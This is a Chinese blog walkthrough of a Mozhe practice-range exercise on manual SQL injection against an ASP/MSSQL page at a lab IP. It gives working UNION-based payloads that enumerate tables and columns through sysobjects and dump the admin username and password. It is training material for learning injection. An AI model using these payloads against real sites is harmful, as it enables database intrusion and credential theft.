(实战)Microsoft SQL手工注入漏洞测试-mozhe

发布于:2022-12-02 ⋅ 阅读:(564) ⋅ 点赞:(0)

Microsoft SQL手工注入漏洞测试

进入靶场环境

  1. 测试是否存在漏洞

219.153.49.228:45295/new_list.asp?id=2 and 1=2

  1. 猜解字段数

219.153.49.228:45295/new_list.asp?id=2 order by 3

219.153.49.228:45295/new_list.asp?id=2 order by 4

219.153.49.228:45295/new_list.asp?id=2 order by 5 报错

说明一共有4个字段

  1. 测试显示位

219.153.49.228:45295/new_list.asp?id=2 and 1=2 union all select '1','2','3','4'

爆出2 3 显示位

  1. 猜解数据库名,数据库版本,当前用户

@@version 获取版本信息

db_name() 当前数据库名字

user、system_user,current_user,user_name 获取当前用户名

@@SERVERNAME 获取服务器主机信息

  1. .猜解数据库mozhe_db_v2中的表名

219.153.49.228:45295/new_list.asp?id=2 and 1=2%20 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null

219.153.49.228:45295/new_list.asp?id=2 and 1=2%20 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

发现存在表名,manage更像管理员表,所以查看这个表

  1. 猜解manage的列名

219.153.49.228:45295/new_list.asp?id=2 and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null

表红的代表第几列,分别1,2,3,4

  1. 猜解完毕 发现manage表中的username,password

219.153.49.228:45295/new_list.asp?id=2 and 1=2 union all select null,username, password ,null from manage

破解得

用户名admin_mz

密码97285101

 

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到